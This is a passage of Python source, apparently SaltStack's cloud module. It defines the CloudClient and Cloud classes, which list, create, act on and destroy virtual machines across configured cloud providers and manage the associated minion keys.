# also filter them to speedup methods like
# __filter_non_working_providers
providers = [
a.get("provider", "").split(":")[0]
for a in tmp_profiles.values()
if a.get("provider", "")
]
if providers:
_providers = opts.get("providers", {})
for provider in _providers.copy():
if provider not in providers:
_providers.pop(provider)
return opts
def low(self, fun, low):
"""
Pass the cloud function and low data structure to run
"""
l_fun = getattr(self, fun)
f_call = salt.utils.args.format_call(l_fun, low)
return l_fun(*f_call.get("args", ()), **f_call.get("kwargs", {}))
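    # Illustrative sketch, not part of the original class: 'low' dispatches a
    # low-data dictionary onto one of the public methods of this class, with
    # salt.utils.args.format_call matching dictionary keys to the method's
    # signature. The profile and VM names below are hypothetical.
    #
    #     client = CloudClient('/etc/salt/cloud')
    #     client.low('profile', {'profile': 'do_512_git', 'names': ['minion01']})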
def list_sizes(self, provider=None):
"""
List all available sizes in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.size_list(provider))
def list_images(self, provider=None):
"""
List all available images in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.image_list(provider))
def list_locations(self, provider=None):
"""
List all available locations in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.location_list(provider))
def query(self, query_type="list_nodes"):
"""
Query basic instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes"
return mapper.map_providers_parallel(query_type)
def full_query(self, query_type="list_nodes_full"):
"""
Query all instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_full"
return mapper.map_providers_parallel(query_type)
def select_query(self, query_type="list_nodes_select"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_select"
return mapper.map_providers_parallel(query_type)
def min_query(self, query_type="list_nodes_min"):
"""
Query minimal instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_min"
return mapper.map_providers_parallel(query_type)
def profile(self, profile, names, vm_overrides=None, **kwargs):
"""
Pass in a profile to create; names is a list of VM names to allocate.
vm_overrides is a special dict of per-node option overrides.
Example:
.. code-block:: python
>>> client= salt.cloud.CloudClient(path='/etc/salt/cloud')
>>> client.profile('do_512_git', names=['minion01',])
{'minion01': {'backups_active': 'False',
'created_at': '2014-09-04T18:10:15Z',
'droplet': {'event_id': 31000502,
'id': 2530006,
'image_id': 5140006,
'name': 'minion01',
'size_id': 66},
'id': '2530006',
'image_id': '5140006',
'ip_address': '107.XXX.XXX.XXX',
'locked': 'True',
'name': 'minion01',
'private_ip_address': None,
'region_id': '4',
'size_id': '66',
'status': 'new'}}
"""
if not vm_overrides:
vm_overrides = {}
kwargs["profile"] = profile
mapper = salt.cloud.Map(self._opts_defaults(**kwargs))
if isinstance(names, str):
names = names.split(",")
return salt.utils.data.simple_types_filter(
mapper.run_profile(profile, names, vm_overrides=vm_overrides)
)
def map_run(self, path=None, **kwargs):
"""
Execute a cloud map
"""
kwarg = {}
if path:
kwarg["map"] = path
kwarg.update(kwargs)
mapper = salt.cloud.Map(self._opts_defaults(**kwarg))
dmap = mapper.map_data()
return salt.utils.data.simple_types_filter(mapper.run_map(dmap))
def destroy(self, names):
"""
Destroy the named VMs
"""
mapper = salt.cloud.Map(self._opts_defaults(destroy=True))
if isinstance(names, str):
names = names.split(",")
return salt.utils.data.simple_types_filter(mapper.destroy(names))
def create(self, provider, names, **kwargs):
"""
Create the named VMs, without using a profile
Example:
.. code-block:: python
client.create(provider='my-ec2-config', names=['myinstance'],
image='ami-1624987f', size='t1.micro', ssh_username='ec2-user',
securitygroup='default', delvol_on_destroy=True)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = self.opts["providers"]
if provider in providers:
provider += ":{}".format(next(iter(providers[provider].keys())))
else:
return False
if isinstance(names, str):
names = names.split(",")
ret = {}
for name in names:
vm_ = kwargs.copy()
vm_["name"] = name
vm_["driver"] = provider
# This function doesn't require a profile, but many cloud drivers
# check for profile information (which includes the provider key) to
# help with config file debugging and setting up instances. Setting
# the profile and provider defaults here avoids errors in other
# cloud functions relying on these keys. See SaltStack Issue #41971
# and PR #38166 for more information.
vm_["profile"] = None
vm_["provider"] = provider
ret[name] = salt.utils.data.simple_types_filter(mapper.create(vm_))
return ret
def extra_action(self, names, provider, action, **kwargs):
"""
Perform actions with block storage devices
Example:
.. code-block:: python
client.extra_action(names=['myblock'], action='volume_create',
provider='my-nova', kwargs={'voltype': 'SSD', 'size': 1000}
)
client.extra_action(names=['salt-net'], action='network_create',
provider='my-nova', kwargs={'cidr': '192.168.100.0/24'}
)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = mapper.map_providers_parallel()
if provider in providers:
provider += ":{}".format(next(iter(providers[provider].keys())))
else:
return False
if isinstance(names, str):
names = names.split(",")
ret = {}
for name in names:
extra_ = kwargs.copy()
extra_["name"] = name
extra_["provider"] = provider
extra_["profile"] = None
extra_["action"] = action
ret[name] = salt.utils.data.simple_types_filter(mapper.extras(extra_))
return ret
def action(
self,
fun=None,
cloudmap=None,
names=None,
provider=None,
instance=None,
kwargs=None,
):
"""
Execute a single action via the cloud plugin backend
Examples:
.. code-block:: python
client.action(fun='show_instance', names=['myinstance'])
client.action(fun='show_image', provider='my-ec2-config',
kwargs={'image': 'ami-10314d79'}
)
"""
if kwargs is None:
kwargs = {}
mapper = salt.cloud.Map(self._opts_defaults(action=fun, names=names, **kwargs))
if instance:
if names:
raise SaltCloudConfigError(
"Please specify either a list of 'names' or a single "
"'instance', but not both."
)
names = [instance]
if names and not provider:
self.opts["action"] = fun
return mapper.do_action(names, kwargs)
if provider and not names:
return mapper.do_function(provider, fun, kwargs)
else:
# This should not be called without either an instance or a
# provider. If both an instance/list of names and a provider
# are given, then we also need to exit. We can only have one
# or the other.
raise SaltCloudConfigError(
"Either an instance (or list of names) or a provider must be "
"specified, but not both."
)
class Cloud:
"""
An object for the creation of new VMs
"""
def __init__(self, opts):
self.opts = opts
self.clouds = salt.loader.clouds(self.opts)
self.__filter_non_working_providers()
self.__cached_provider_queries = {}
def get_configured_providers(self):
"""
Return the configured providers
"""
providers = set()
for alias, drivers in self.opts["providers"].items():
if len(drivers) > 1:
for driver in drivers:
providers.add("{}:{}".format(alias, driver))
continue
providers.add(alias)
return providers
def lookup_providers(self, lookup):
"""
Return the set of (alias, driver) pairs matching the given provider lookup
"""
if lookup is None:
lookup = "all"
if lookup == "all":
providers = set()
for alias, drivers in self.opts["providers"].items():
for driver in drivers:
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit("There are no cloud providers configured.")
return providers
if ":" in lookup:
alias, driver = lookup.split(":")
if (
alias not in self.opts["providers"]
or driver not in self.opts["providers"][alias]
):
raise SaltCloudSystemExit(
"No cloud providers matched '{}'. Available: {}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
providers = set()
for alias, drivers in self.opts["providers"].items():
for driver in drivers:
if lookup in (alias, driver):
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit(
"No cloud providers matched '{}'. "
"Available selections: {}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
return providers
def lookup_profiles(self, provider, lookup):
"""
Return the set of (profile alias, provider) pairs for the configured profiles
"""
if provider is None:
provider = "all"
if lookup is None:
lookup = "all"
if lookup == "all":
profiles = set()
provider_profiles = set()
for alias, info in self.opts["profiles"].items():
providers = info.get("provider")
if providers:
given_prov_name = providers.split(":")[0]
salt_prov_name = providers.split(":")[1]
if given_prov_name == provider:
provider_profiles.add((alias, given_prov_name))
elif salt_prov_name == provider:
provider_profiles.add((alias, salt_prov_name))
profiles.add((alias, given_prov_name))
if not profiles:
raise SaltCloudSystemExit("There are no cloud profiles configured.")
if provider != "all":
return provider_profiles
return profiles
def map_providers(self, query="list_nodes", cached=False):
"""
Return a mapping of which named VMs are running on which VM providers,
based on the providers defined in the configuration
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
pmap = {}
for alias, drivers in self.opts["providers"].items():
for driver, details in drivers.items():
fun = "{}.{}".format(driver, query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
if alias not in pmap:
pmap[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
pmap[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for "
"running nodes: %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any
# nodes
pmap[alias][driver] = []
self.__cached_provider_queries[query] = pmap
return pmap
def map_providers_parallel(self, query="list_nodes", cached=False):
"""
Return a mapping of which named VMs are running on which VM providers,
based on the providers defined in the configuration.
Same as map_providers, but queries providers in parallel.
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
opts = self.opts.copy()
multiprocessing_data = []
# Optimize Providers
opts["providers"] = self._optimize_providers(opts["providers"])
for alias, drivers in opts["providers"].items():
# Make a temporary query for this driver to avoid overwriting the next one
this_query = query
for driver, details in drivers.items():
# If the driver has a list_nodes_min function, replace the query
# param with it to check existing VMs on this driver with minimal
# information. Otherwise, keep using the query param.
if (
opts.get("selected_query_option") is None
and "{}.list_nodes_min".format(driver) in self.clouds
):
this_query = "list_nodes_min"
fun = "{}.{}".format(driver, this_query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
multiprocessing_data.append(
{
"fun": fun,
"opts": opts,
"query": this_query,
"alias": alias,
"driver": driver,
}
)
output = {}
if not multiprocessing_data:
return output
data_count = len(multiprocessing_data)
pool = multiprocessing.Pool(
data_count < 10 and data_count or 10, init_pool_worker
)
parallel_pmap = enter_mainloop(
_run_parallel_map_providers_query, multiprocessing_data, pool=pool
)
for alias, driver, details in parallel_pmap:
if not details:
# There are no provider details?! Skip it!
continue
if alias not in output:
output[alias] = {}
output[alias][driver] = details
self.__cached_provider_queries[query] = output
return output
def get_running_by_names(
self, names, query="list_nodes", cached=False, profile=None
):
if isinstance(names, str):
names = [names]
matches = {}
handled_drivers = {}
mapped_providers = self.map_providers_parallel(query, cached=cached)
for alias, drivers in mapped_providers.items():
for driver, vms in drivers.items():
if driver not in handled_drivers:
handled_drivers[driver] = alias
# When a profile is specified, only return an instance
# that matches the provider specified in the profile.
# This solves the issues when many providers return the
# same instance. For example there may be one provider for
# each availability zone in amazon in the same region, but
# the search returns the same instance for each provider
# because amazon returns all instances in a region, not
# availability zone.
if (
profile
and alias
not in self.opts["profiles"][profile]["provider"].split(":")[0]
):
continue
for vm_name, details in vms.items():
# XXX: The logic below can be removed once the aws driver
# is removed
if vm_name not in names:
continue
elif (
driver == "ec2"
and "aws" in handled_drivers
and "aws" in matches[handled_drivers["aws"]]
and vm_name in matches[handled_drivers["aws"]]["aws"]
):
continue
elif (
driver == "aws"
and "ec2" in handled_drivers
and "ec2" in matches[handled_drivers["ec2"]]
and vm_name in matches[handled_drivers["ec2"]]["ec2"]
):
continue
if alias not in matches:
matches[alias] = {}
if driver not in matches[alias]:
matches[alias][driver] = {}
matches[alias][driver][vm_name] = details
return matches
def _optimize_providers(self, providers):
"""
Return an optimized mapping of available providers
"""
new_providers = {}
provider_by_driver = {}
for alias, driver in providers.items():
for name, data in driver.items():
if name not in provider_by_driver:
provider_by_driver[name] = {}
provider_by_driver[name][alias] = data
for driver, providers_data in provider_by_driver.items():
fun = "{}.optimize_providers".format(driver)
if fun not in self.clouds:
log.debug("The '%s' cloud driver is unable to be optimized.", driver)
for name, prov_data in providers_data.items():
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
continue
new_data = self.clouds[fun](providers_data)
if new_data:
for name, prov_data in new_data.items():
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
return new_providers
def location_list(self, lookup="all"):
"""
Return a mapping of all location data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{}.avail_locations".format(driver)
if fun not in self.clouds:
# The capability to gather locations is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the locations information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def image_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{}.avail_images".format(driver)
if fun not in self.clouds:
# The capability to gather images is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the images information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def size_list(self, lookup="all"):
"""
Return a mapping of all size data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{}.avail_sizes".format(driver)
if fun not in self.clouds:
# The capability to gather sizes is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the sizes information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def provider_list(self, lookup="all"):
"""
Return a mapping of the configured provider aliases and drivers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def profile_list(self, provider, lookup="all"):
"""
Return a mapping of all configured profiles
"""
data = {}
lookups = self.lookup_profiles(provider, lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def create_all(self):
"""
Create/Verify the VMs in the VM data
"""
ret = []
for vm_name, vm_details in self.opts["profiles"].items():
ret.append({vm_name: self.create(vm_details)})
return ret
def destroy(self, names, cached=False):
"""
Destroy the named VMs
"""
processed = {}
names = set(names)
matching = self.get_running_by_names(names, cached=cached)
vms_to_destroy = set()
parallel_data = []
for alias, drivers in matching.items():
for driver, vms in drivers.items():
for name in vms:
if name in names:
vms_to_destroy.add((alias, driver, name))
if self.opts["parallel"]:
parallel_data.append(
{
"opts": self.opts,
"name": name,
"alias": alias,
"driver": driver,
}
)
# destroying in parallel
if self.opts["parallel"] and parallel_data:
# set the pool size based on configuration or default to
# the number of machines we're destroying
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Destroying in parallel mode; " "Cloud pool size: %s", pool_size)
# kick off the parallel destroy
output_multip = enter_mainloop(
_destroy_multiprocessing, parallel_data, pool_size=pool_size
)
# massage the multiprocessing output a bit
ret_multip = {}
for obj in output_multip:
ret_multip.update(obj)
# build up a data structure similar to what the non-parallel
# destroy uses
for obj in parallel_data:
alias = obj["alias"]
driver = obj["driver"]
name = obj["name"]
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret_multip[name]
if name in names:
names.remove(name)
# not destroying in parallel
else:
log.info("Destroying in non-parallel mode.")
for alias, driver, name in vms_to_destroy:
fun = "{}.destroy".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
ret = self.clouds[fun](name)
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret
if name in names:
names.remove(name)
# now the processed data structure contains the output from either
# the parallel or non-parallel destroy and we should finish up
# with removing minion keys if necessary
for alias, driver, name in vms_to_destroy:
ret = processed[alias][driver][name]
if not ret:
continue
vm_ = {
"name": name,
"profile": None,
"provider": ":".join([alias, driver]),
"driver": driver,
}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
key_file = os.path.join(
self.opts["pki_dir"], "minions", minion_dict.get("id", name)
)
globbed_key_file = glob.glob("{}.*".format(key_file))
if not os.path.isfile(key_file) and not globbed_key_file:
# There's no such key file!? It might have been renamed
if isinstance(ret, dict) and "newname" in ret:
salt.utils.cloud.remove_key(self.opts["pki_dir"], ret["newname"])
continue
if os.path.isfile(key_file) and not globbed_key_file:
# Single key entry. Remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(key_file)
)
continue
# Since we have globbed matches, there are probably some keys whose
# minion configuration has append_domain set.
if (
not os.path.isfile(key_file)
and globbed_key_file
and len(globbed_key_file) == 1
):
# Single entry, let's remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(globbed_key_file[0])
)
continue
# Since we can't get the profile or map entry used to create
# the VM, we also can't get the append_domain setting.
# And if we reached this point, there are several minion keys
# whose name starts with the machine name we're deleting.
# We need to ask about them one by one.
print(
"There are several minion keys whose name starts "
"with '{}'. We need to ask you which one should be "
"deleted:".format(name)
)
while True:
for idx, filename in enumerate(globbed_key_file):
print(" {}: {}".format(idx, os.path.basename(filename)))
selection = input("Which minion key should be deleted(number)? ")
try:
selection = int(selection)
except ValueError:
print("'{}' is not a valid selection.".format(selection))
try:
filename = os.path.basename(globbed_key_file.pop(selection))
except Exception: # pylint: disable=broad-except
continue
delete = input("Delete '{}'? [Y/n]? ".format(filename))
if delete == "" or delete.lower().startswith("y"):
salt.utils.cloud.remove_key(self.opts["pki_dir"], filename)
print("Deleted '{}'".format(filename))
break
print("Did not delete '{}'".format(filename))
break
if names and not processed:
# These machines were asked to be destroyed but could not be found
raise SaltCloudSystemExit(
"The following VM's were not found: {}".format(", ".join(names))
)
elif names and processed:
processed["Not Found"] = names
elif not processed:
raise SaltCloudSystemExit("No machines were destroyed!")
return processed
def reboot(self, names):
"""
Reboot the named VMs
"""
ret = []
pmap = self.map_providers_parallel()
acts = {}
for prov, nodes in pmap.items():
acts[prov] = []
for node in nodes:
if node in names:
acts[prov].append(node)
for prov, names_ in acts.items():
fun = "{}.reboot".format(prov)
for name in names_:
ret.append({name: self.clouds[fun](name)})
return ret
def create(self, vm_, local_master=True):
"""
Create a single VM
"""
output = {}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
alias, driver = vm_["provider"].split(":")
fun = "{}.create".format(driver)
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
vm_["name"],
vm_["provider"],
driver,
)
return
deploy = salt.config.get_cloud_config_value("deploy", vm_, self.opts)
make_master = salt.config.get_cloud_config_value("make_master", vm_, self.opts)
if deploy:
if not make_master and "master" not in minion_dict:
log.warning(
"There's no master defined on the '%s' VM settings.", vm_["name"]
)
if "pub_key" not in vm_ and "priv_key" not in vm_:
log.debug("Generating minion keys for '%s'", vm_["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["pub_key"] = pub
vm_["priv_key"] = priv
else:
# Note(pabelanger): We still reference pub_key and priv_key when
# deploy is disabled.
vm_["pub_key"] = None
vm_["priv_key"] = None
key_id = minion_dict.get("id", vm_["name"])
domain = vm_.get("domain")
if vm_.get("use_fqdn") and domain:
minion_dict["append_domain"] = domain
if "append_domain" in minion_dict:
key_id = ".".join([key_id, minion_dict["append_domain"]])
if make_master is True and "master_pub" not in vm_ and "master_pem" not in vm_:
log.debug("Generating the master keys for '%s'", vm_["name"])
master_priv, master_pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["master_pub"] = master_pub
vm_["master_pem"] = master_priv
if local_master is True and deploy is True:
# Accept the key on the local master
salt.utils.cloud.accept_key(self.opts["pki_dir"], vm_["pub_key"], key_id)
vm_["os"] = salt.config.get_cloud_config_value("script", vm_, self.opts)
try:
vm_["inline_script"] = salt.config.get_cloud_config_value(
"inline_script", vm_, self.opts
)
except KeyError:
pass
try:
alias, driver = vm_["provider"].split(":")
func = "{}.create".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
output = self.clouds[func](vm_)
if output is not False and "sync_after_install" in self.opts:
if self.opts["sync_after_install"] not in (
"all",
"modules",
"states",
"grains",
):
log.error("Bad option for sync_after_install")
return output
# A small pause helps the sync work more reliably
time.sleep(3)
start = int(time.time())
while int(time.time()) < start + 60:
# We'll try every <timeout> seconds, up to a minute
mopts_ = salt.config.DEFAULT_MASTER_OPTS
conf_path = "/".join(self.opts["conf_file"].split("/")[:-1])
mopts_.update(
salt.config.master_config(os.path.join(conf_path, "master"))
)
with salt.client.get_local_client(mopts=mopts_) as client:
ret = client.cmd(
vm_["name"],
"saltutil.sync_{}".format(self.opts["sync_after_install"]),
timeout=self.opts["timeout"],
)
if ret:
log.info(
"Synchronized the following dynamic modules: "
" {}".format(ret)
)
break
except KeyError as exc:
log.exception(
"Failed to create VM %s. Configuration value %s needs " "to be set",
vm_["name"],
exc,
)
# If it's a map then we need to respect the 'requires'
# so we do it later
try:
opt_map = self.opts["map"]
except KeyError:
opt_map = False
if self.opts["parallel"] and self.opts["start_action"] and not opt_map:
log.info("Running %s on %s", self.opts["start_action"], vm_["name"])
with salt.client.get_local_client(mopts=self.opts) as client:
action_out = client.cmd(
vm_["name"],
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
)
output["ret"] = action_out
return output
@staticmethod
def vm_config(name, main, provider, profile, overrides):
"""
Create vm config.
:param str name: The name of the vm
:param dict main: The main cloud config
:param dict provider: The provider config
:param dict profile: The profile config
:param dict overrides: The vm's config overrides
"""
vm = main.copy()
vm = salt.utils.dictupdate.update(vm, provider)
vm = salt.utils.dictupdate.update(vm, profile)
vm.update(overrides)
vm["name"] = name
return vm
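    # Illustrative sketch, not part of the original class: vm_config layers
    # its inputs with later sources winning (main < provider < profile <
    # overrides) and then pins 'name'. The values below are hypothetical.
    #
    #     Cloud.vm_config(
    #         'web01',
    #         main={'keep_tmp': False, 'image': 'from-main'},
    #         provider={'image': 'from-provider', 'size': 'small'},
    #         profile={'size': 'medium'},
    #         overrides={'size': 'large'},
    #     )
    #     # -> {'keep_tmp': False, 'image': 'from-provider',
    #     #     'size': 'large', 'name': 'web01'}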
def extras(self, extra_):
"""
Extra actions
"""
output = {}
alias, driver = extra_["provider"].split(":")
fun = "{}.{}".format(driver, extra_["action"])
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
extra_["name"],
extra_["provider"],
driver,
)
return
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=extra_["provider"]
):
output = self.clouds[fun](**extra_)
except KeyError as exc:
log.exception(
"Failed to perform %s.%s on %s. "
"Configuration value %s needs to be set",
extra_["provider"],
extra_["action"],
extra_["name"],
exc,
)
return output
def run_profile(self, profile, names, vm_overrides=None):
"""
Parse over the options passed on the command line and determine how to
handle them
"""
if profile not in self.opts["profiles"]:
msg = "Profile {} is not defined".format(profile)
log.error(msg)
return {"Error": msg}
ret = {}
if not vm_overrides:
vm_overrides = {}
try:
with salt.utils.files.fopen(self.opts["conf_file"], "r") as mcc:
main_cloud_config = salt.utils.yaml.safe_load(mcc)
if not main_cloud_config:
main_cloud_config = {}
except KeyError:
main_cloud_config = {}
except OSError:
main_cloud_config = {}
if main_cloud_config is None:
main_cloud_config = {}
mapped_providers = self.map_providers_parallel()
profile_details = self.opts["profiles"][profile]
vms = {}
for prov, val in mapped_providers.items():
prov_name = next(iter(val))
for node in mapped_providers[prov][prov_name]:
vms[node] = mapped_providers[prov][prov_name][node]
vms[node]["provider"] = prov
vms[node]["driver"] = prov_name
alias, driver = profile_details["provider"].split(":")
provider_details = self.opts["providers"][alias][driver].copy()
del provider_details["profiles"]
for name in names:
if name in vms:
prov = vms[name]["provider"]
driv = vms[name]["driver"]
msg = "{} already exists under {}:{}".format(name, prov, driv)
log.error(msg)
ret[name] = {"Error": msg}
continue
vm_ = self.vm_config(
name,
main_cloud_config,
provider_details,
profile_details,
vm_overrides,
)
if self.opts["parallel"]:
process = multiprocessing.Process(target=self.create, args=(vm_,))
process.start()
ret[name] = {
"Provisioning": "VM being provisioned in parallel. "
"PID: {}".format(process.pid)
}
continue
try:
# No need to inject __active_provider_name__ into the context
# here because self.create takes care of that
ret[name] = self.create(vm_)
if not ret[name]:
ret[name] = {"Error": "Failed to deploy VM"}
if len(names) == 1:
raise SaltCloudSystemExit("Failed to deploy VM")
continue
if self.opts.get("show_deploy_args", False) is False:
ret[name].pop("deploy_kwargs", None)
except (SaltCloudSystemExit, SaltCloudConfigError) as exc:
if len(names) == 1:
raise
ret[name] = {"Error": str(exc)}
return ret
def do_action(self, names, kwargs):
"""
Perform an action on a VM which may be specific to this cloud provider
"""
ret = {}
invalid_functions = {}
names = set(names)
for alias, drivers in self.map_providers_parallel().items():
if not names:
break
for driver, vms in drivers.items():
if not names:
break
valid_function = True
fun = "{}.{}".format(driver, self.opts["action"])
if fun not in self.clouds:
log.info("'%s()' is not available. Not actioning...", fun)
valid_function = False
for vm_name, vm_details in vms.items():
if not names:
break
if vm_name not in names:
if not isinstance(vm_details, dict):
vm_details = {}
if "id" in vm_details and vm_details["id"] in names:
vm_name = vm_details["id"]
else:
log.debug(
"vm:%s in provider:%s is not in name " "list:'%s'",
vm_name,
driver,
names,
)
continue
# Build the dictionary of invalid functions with their associated VMs.
if valid_function is False:
if invalid_functions.get(fun) is None:
invalid_functions.update({fun: []})
invalid_functions[fun].append(vm_name)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
if alias not in ret:
ret[alias] = {}
if driver not in ret[alias]:
ret[alias][driver] = {}
# Clean kwargs of "__pub_*" data before running the cloud action call.
# Prevents calling positional "kwarg" arg before "call" when no kwarg
# argument is present in the cloud driver function's arg spec.
kwargs = salt.utils.args.clean_kwargs(**kwargs)
if kwargs:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, kwargs, call="action"
)
else:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, call="action"
)
names.remove(vm_name)
# Set the return information for the VMs listed in the invalid_functions dict.
missing_vms = set()
if invalid_functions:
ret["Invalid Actions"] = invalid_functions
invalid_func_vms = set()
for key, val in invalid_functions.items():
invalid_func_vms = invalid_func_vms.union(set(val))
# Find the VMs that are in names, but not in set of invalid functions.
missing_vms = names.difference(invalid_func_vms)
if missing_vms:
ret["Not Found"] = list(missing_vms)
ret["Not Actioned/Not Running"] = list(names)
if not names:
return ret
# Don't return missing VM information for invalid functions until after we've had a
# chance to return successful actions. If a function is valid for one driver, but
# not another, we want to make sure the successful action is returned properly.
if missing_vms:
return ret
# If we reach this point, the Not Actioned and Not Found lists will be the same,
# but we want to list both for clarity/consistency with the invalid functions lists.
ret["Not Actioned/Not Running"] = list(names)
ret["Not Found"] = list(names)
return ret
def do_function(self, prov, func, kwargs):
"""
Perform a function against a cloud provider
"""
matches = self.lookup_providers(prov)
if len(matches) > 1:
raise SaltCloudSystemExit(
"More than one results matched '{}'. Please specify "
"one of: {}".format(
prov,
", ".join(
["{}:{}".format(alias, driver) for (alias, driver) in matches]
),
)
)
alias, driver = matches.pop()
fun = "{}.{}".format(driver, func)
if fun not in self.clouds:
raise SaltCloudSystemExit(
"The '{}' cloud provider alias, for the '{}' driver, does "
"not define the function '{}'".format(alias, driver, func)
)
log.debug("Trying to execute '%s' with the following kwargs: %s", fun, kwargs)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if kwargs:
return {
alias: {driver: self.clouds[fun](call="function", kwargs=kwargs)}
}
return {alias: {driver: self.clouds[fun](call="function")}}
def __filter_non_working_providers(self):
"""
Remove any mis-configured cloud providers from the available listing
"""
for alias, drivers in self.opts["providers"].copy().items():
for driver in drivers.copy():
fun = "{}.get_configured_provider".format(driver)
if fun not in self.clouds:
# Mis-configured provider that got removed?
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias, could not be loaded. "
"Please check your provider configuration files and "
"ensure all required dependencies are installed "
"for the '%s' driver.\n"
"In rare cases, this could indicate the '%s()' "
"function could not be found.\nRemoving '%s' from "
"the available providers list",
driver,
alias,
driver,
fun,
driver,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if self.clouds[fun]() is False:
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias is not properly "
"configured. Removing it from the available "
"providers list.",
driver,
alias,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
class Map(Cloud):
"""
Create a VM stateful map execution object
"""
def __init__(self, opts):
